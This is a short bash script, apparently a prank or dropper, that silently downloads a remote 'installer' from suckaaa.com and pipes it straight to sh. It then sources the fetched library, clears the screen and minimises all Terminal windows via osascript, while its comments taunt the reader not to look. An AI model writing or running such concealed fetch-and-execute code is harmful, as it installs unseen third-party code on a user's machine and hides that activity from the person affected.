#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

osascript -e 'tell application "Terminal" to set miniaturized of every window to true';

# Run the next script
# nextScript 'https://suckaaa.com/s/script-name-here';

